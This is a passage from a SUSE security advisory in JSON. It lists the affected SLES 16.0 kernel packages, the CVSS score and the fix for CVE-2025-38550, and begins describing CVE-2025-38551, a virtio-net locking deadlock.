"references": [
{
"category": "external",
"summary": "CVE-2025-38550",
"url": "https://www.suse.com/security/cve/CVE-2025-38550"
},
{
"category": "external",
"summary": "SUSE Bug 1248227 for CVE-2025-38550",
"url": "https://bugzilla.suse.com/1248227"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38550"
},
{
"cve": "CVE-2025-38551",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38551"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio-net: fix recursived rtnl_lock() during probe()\n\nThe deadlock appears in a stack trace like:\n\n virtnet_probe()\n rtnl_lock()\n virtio_config_changed_work()\n netdev_notify_peers()\n rtnl_lock()\n\nIt happens if the VMM sends a VIRTIO_NET_S_ANNOUNCE request while the\nvirtio-net driver is still probing.\n\nThe config_work in probe() will get scheduled until virtnet_open() enables\nthe config change notification via virtio_config_driver_enable().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
